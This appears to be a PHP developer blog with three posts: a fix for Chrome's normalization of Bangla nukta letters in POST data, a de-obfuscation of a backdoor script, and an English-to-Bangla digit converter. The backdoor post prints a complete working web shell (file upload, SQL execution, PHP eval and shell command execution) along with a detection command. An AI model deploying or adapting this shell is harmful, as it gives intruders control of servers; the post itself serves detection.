Google Chrome Unicode normalization and য়, ড়, ঢ় problem

If you use Google Chrome to write Bangla, you may already have run into this problem. Every time you send a POST request (it seems to affect POST data only), Chrome automatically normalizes Unicode characters. In Bangla, three characters are affected: য়, ড় and ঢ়.

What does Chrome actually do?

If you look carefully, each of these three characters has a dot (a nukta) underneath, and Bangla has three other characters that look the same but without the dot. So there are six characters in total: ড, ঢ, য, ড়, ঢ়, য়. Unicode gives the last three their own code points (U+09DC, U+09DD, U+09DF), but each can also be written as one of the first three (U+09A1, U+09A2, U+09AF) followed by a separate dot, U+09BC. Chrome uses this second form: every time a request contains one of the last three characters, Chrome converts it to the corresponding base character and then adds the dot. This is called normalization. It happens only to data in the HTTP request body, so cookies, headers and the query string are not affected, since all three travel in the HTTP request header. I suspect it also happens with PUT requests.

An Example

Let's say we submit a form whose request method is POST and which has one input field. If you type “গাঢ় সবুজ পেয়াড়া” (a phrase that contains all three problem characters) and submit the form, Chrome will send “গাঢ় সবুজ পেয়াড়া”. The two strings look alike, but they are different. The hex dumps below show it: in three places a 3-byte sequence in the first line (e0a79d, e0a79f, e0a79c) becomes a 6-byte sequence in the second (e0a6a2e0a6bc, e0a6afe0a6bc, e0a6a1e0a6bc). Spaces are added to the first line to keep the two aligned.

before: hex(গাঢ় সবুজ পেয়াড়া)= e0a697e0a6bee0a79d      20e0a6b8e0a6ace0a781e0a69c20e0a6aae0a787e0a79f      e0a6bee0a79c      e0a6be
after:  hex(গাঢ় সবুজ পেয়াড়া)= e0a697e0a6bee0a6a2e0a6bc20e0a6b8e0a6ace0a781e0a69c20e0a6aae0a787e0a6afe0a6bce0a6bee0a6a1e0a6bce0a6be
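The difference can also be checked from PHP. The sketch below builds both forms of one of the affected letters from byte escapes, so that no editor or browser can normalize the source, and compares them. The variable names are only illustrative.

```php
<?php
// Precomposed BENGALI LETTER RHA (U+09DD), as typed by the user.
$precomposed = "\xE0\xA7\x9D";
// Decomposed form: DDHA (U+09A2) followed by the nukta sign (U+09BC).
$decomposed = "\xE0\xA6\xA2\xE0\xA6\xBC";

// The two strings render identically but are different byte sequences.
$sameBytes = ($precomposed === $decomposed); // false

echo bin2hex($precomposed), "\n"; // e0a79d
echo bin2hex($decomposed), "\n";  // e0a6a2e0a6bc
echo strlen($precomposed), ' vs ', strlen($decomposed), " bytes\n"; // 3 vs 6 bytes
```

A plain string comparison, a database lookup or a search against stored text will therefore treat the two forms as different words.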

Key points:

  • This normalization is applied to any data that resides in the HTTP request body, so only POST and PUT requests are affected. Cookie, header and query string data are unaffected.
  • The inconsistency between the HTTP request body and the header suggests that this is a Chrome bug.
  • Data should be normalized either everywhere in the HTTP request or nowhere.

Solution:

Now that you understand the problem, the fix is straightforward. First, file a bug with the Google Chrome team. Until Google fixes it, you can replace those characters in your web application. Here is a snippet I have written to do this in PHP.

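[code language="PHP"]
class DeNormalOntosteo {
    // Decomposed form (base letter + nukta U+09BC) => precomposed letter.
    // Byte escapes are used so the map survives editors that normalize text.
    private static $strmap = array(
        "\xE0\xA6\xAF\xE0\xA6\xBC" => "\xE0\xA7\x9F", // U+09AF U+09BC => U+09DF
        "\xE0\xA6\xA1\xE0\xA6\xBC" => "\xE0\xA7\x9C", // U+09A1 U+09BC => U+09DC
        "\xE0\xA6\xA2\xE0\xA6\xBC" => "\xE0\xA7\x9D", // U+09A2 U+09BC => U+09DD
    );

    public static function replace($data) {
        if (is_array($data)) {
            $keys = array_keys($data);
            $values = array_values($data);
            $len = count($values);
            while ($len--) {
                $values[$len] = str_replace(array_keys(self::$strmap), array_values(self::$strmap), $values[$len]);
            }
            return array_combine($keys, $values);
        } elseif (is_string($data)) {
            return str_replace(array_keys(self::$strmap), array_values(self::$strmap), $data);
        } else {
            return false;
        }
    }
}
[/code]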

Usage

[code lang="PHP"]
// Denormalizing $_POST array
$_POST = DeNormalOntosteo::replace($_POST);
// Denormalizing a string
$_POST['data'] = DeNormalOntosteo::replace($_POST['data']);
[/code]

Update 1:

I have created a page where you can see the bug in action. You must use Google Chrome to view it. Just visit the page and press submit.

Update 2: 

I have filed a bug with the Chromium team on Google Code. If you are having the same issue, please give them a knock here.

De-obfuscate a backdoor PHP script

Today (almost an hour ago) I got an encoded script. At first glance I thought it was one of those WordPress footer files that theme makers obfuscate, so I started to decode it. The decoding process is very simple: mainly replacing “eval” with “echo”. I am not going to describe the process in detail.

I used this code to decode it.

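[code language="php"]
$contents = file_get_contents("php://stdin");
// Single quotes keep the backslashes literal: we are looking for the
// hex-escaped text exactly as it appears in the obfuscated file.
$create_function = '\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e';
$base64_decode = '\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65';
if (strpos($contents, $create_function) !== false) {
    echo "create_function() invocation found! \n";
    if (strpos($contents, $base64_decode) !== false) {
        echo "base64_decode() invocation found! \n";
    }
}

// finding base64 pattern
if (!preg_match('/"([a-zA-Z0-9\/+]{500,}[=]{0,2})"/', $contents, $m)) {
    exit("No base64 payload found.\n");
}
$data = base64_decode($m[1]);
// Warning: this still executes the rest of the untrusted payload.
// Run it only in an isolated, throwaway environment.
eval(str_replace('eval', 'echo', $data));
[/code]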
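Because the decoder above ends in eval(), it still runs part of the untrusted script. A more cautious variant, sketched below, only extracts and decodes the payload so it can be read in an editor. The function name extract_payload() is made up for this example, and the 500-character threshold is simply the one used above.

```php
<?php
/**
 * Return the decoded base64 payload found in $contents, or null if none.
 * Hypothetical helper: nothing is executed, the payload is only decoded.
 */
function extract_payload($contents, $minLength = 500)
{
    // Same pattern as above: a long quoted run of base64 characters.
    $pattern = '/"([a-zA-Z0-9\/+]{' . (int) $minLength . ',}={0,2})"/';
    if (!preg_match($pattern, $contents, $m)) {
        return null;
    }
    // Strict mode makes base64_decode() return false on invalid input.
    $decoded = base64_decode($m[1], true);
    return $decoded === false ? null : $decoded;
}

// Possible use from the command line (file names are placeholders):
//   echo extract_payload(file_get_contents('suspicious.php'));
```

If the decoded text contains another encoded layer, the same function can be applied to its output again.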

And here is the result.

[code language="PHP"]
error_reporting(E_ERROR | E_WARNING | E_PARSE);
ini_set('display_errors', "0");
if ($_POST["p"] != "") {
$_COOKIE["p"] = $_POST["p"];
setcookie("p", $_POST["p"], time() + 3600);
}

if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") {
echo "<form method=post>";
echo "<input type=text name=p value='' size=50>";
echo "<input type=submit name=B_SUBMIT value='Check'>";
echo "</form>";
exit;
}

if ($_POST["action"] == "upload") {

$l=$_FILES["filepath"]["tmp_name"];
$newpath=$_POST["newpath"];
if ($newpath!="") move_uploaded_file($l,$newpath);
echo "done";

} else if ($_POST["action"] == "sql") {

$query = $_POST["query"];
$query = str_replace("\'","'",$query);
$lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error());
mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());
mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());
mysql_close($lnk);
echo "done<br><pre>$query</pre>";

} else if ($_POST["action"] == "runphp") {

eval(base64_decode($_POST["cmd"]));

} else {

$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
} else $disablefunc = array();

function myshellexec($cmd) {
global $disablefunc;
$result = "";
if (!empty($cmd)) {
if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = @popen($cmd,"r"))) {
$result = "";
while(!feof($fp)) {$result .= @fread($fp,1024);}
@pclose($fp);
}
}
return $result;
}
$cmd = stripslashes($_POST["cmd"]);
$cmd_enc = stripslashes($_POST["cmd_enc"]);
if ($_POST["enc"]==1){
$cmd=base64_decode($cmd_enc);
}
?>
<script language=javascript type="text/javascript">
<!--
var END_OF_INPUT = -1;
var base64Chars = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/');
var reverseBase64Chars = new Array();
for (var i=0; i < base64Chars.length; i++){
reverseBase64Chars[base64Chars[i]] = i;
}
var base64Str;
var base64Count;
function setBase64Str(str){
base64Str = str;
base64Count = 0;
}
function readBase64(){
if (!base64Str) return END_OF_INPUT;
if (base64Count >= base64Str.length) return END_OF_INPUT;
var c = base64Str.charCodeAt(base64Count) & 0xff;
base64Count++;
return c;
}
function encodeBase64(str){
setBase64Str(str);
var result = '';
var inBuffer = new Array(3);
var lineCount = 0;
var done = false;
while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){
inBuffer[1] = readBase64();
inBuffer[2] = readBase64();
result += (base64Chars[ inBuffer[0] >> 2 ]);
if (inBuffer[1] != END_OF_INPUT){
result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1] >> 4) ]);
if (inBuffer[2] != END_OF_INPUT){
result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[2] >> 6) ]);
result += (base64Chars [inBuffer[2] & 0x3F]);
} else {
result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);
result += ('=');
done = true;
}
} else {
result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);
result += ('=');
result += ('=');
done = true;
}
lineCount += 4;
if (lineCount >= 76){
result += ('\n');
lineCount = 0;
}
}
return result;
}
function encodeIt(f){
l=encodeBase64(f.cmd.value);
f.cmd_enc.value=l;
f.cmd.value="";
f.enc.value=1;
f.submit();
}
//--></script>
<?

echo "<form method=post action='' onSubmit='encodeIt(this);return false;'>";
echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\" size=150>";
echo "<input type=hidden name=enc value='0'>";
echo "<input type=hidden name=cmd_enc value=''>";
echo "<input type=submit name=B_SUBMIT value=’Go’>";
echo "</form>";
if ($cmd != "") {
echo "<pre>";
$cmd=stripslashes($cmd);
echo "Executing $cmd \n";
echo myshellexec("$cmd");
echo "</pre>";
exit;
}
}
[/code]

If you look at the code carefully, you’ll notice it’s a backdoor.

  • It can upload arbitrary files
  • It can execute MySQL queries
  • It can execute arbitrary PHP code
  • It can run shell commands

If you want to check whether your server has such a script, run the following command in a shell in your web root.
find . -iname '*.php' -size 28k -exec egrep '\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e' -o {} \;

Here “\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e” is the hex-encoded string “create_function”, the name of a PHP function that creates a function dynamically from a string.
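The same check can be done from PHP where shell access is not available. This is only a rough sketch: the function name find_suspicious_files() is hypothetical, it drops the size filter used in the command above, and a match only means the file deserves a closer look.

```php
<?php
/**
 * List .php files under $root that contain the literal, hex-escaped
 * text "create_function". Hypothetical helper for illustration.
 */
function find_suspicious_files($root)
{
    // Single quotes keep the backslashes literal, exactly as they
    // appear in the obfuscated source.
    $needle = '\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e';
    $hits = array();
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        // Only regular files with a .php extension (case-insensitive).
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $contents = file_get_contents($file->getPathname());
        if ($contents !== false && strpos($contents, $needle) !== false) {
            $hits[] = $file->getPathname();
        }
    }
    sort($hits);
    return $hits;
}
```

Calling find_suspicious_files('.') from the web root returns the paths of the matching files.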

Convert numbers from English to Bangla

Today Ayon came up with a problem: he needed to convert English digits to Bangla. The input would be something like “1 ডলার = 81.55 টাকা” and the output should be “১ ডলার = ৮১.৫৫ টাকা”. How to do it?

It’s very easy to do. In fact, most developers would be able to do it within a few minutes. I just want to share my solution.

I use PHP’s str_replace function.

[code language="PHP"]
$bn_digits = array('০', '১', '২', '৩', '৪', '৫', '৬', '৭', '৮', '৯');
$output = str_replace(range(0, 9), $bn_digits, $input);
[/code]

That’s it. You can wrap it in a function and reuse it.
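One possible wrapper is sketched here. The function name en_to_bn_digits() is just a suggestion, and the search digits are written out as strings rather than generated with range().

```php
<?php
/**
 * Replace the ASCII digits 0-9 in $input with the matching Bangla digits.
 * The function name is illustrative only.
 */
function en_to_bn_digits($input)
{
    $en_digits = array('0', '1', '2', '3', '4', '5', '6', '7', '8', '9');
    $bn_digits = array('০', '১', '২', '৩', '৪', '৫', '৬', '৭', '৮', '৯');
    // Position i in $en_digits is replaced by position i in $bn_digits.
    return str_replace($en_digits, $bn_digits, $input);
}

echo en_to_bn_digits('1 USD = 81.55 BDT'), "\n"; // ১ USD = ৮১.৫৫ BDT
```

Everything that is not an ASCII digit, including the decimal point, passes through unchanged.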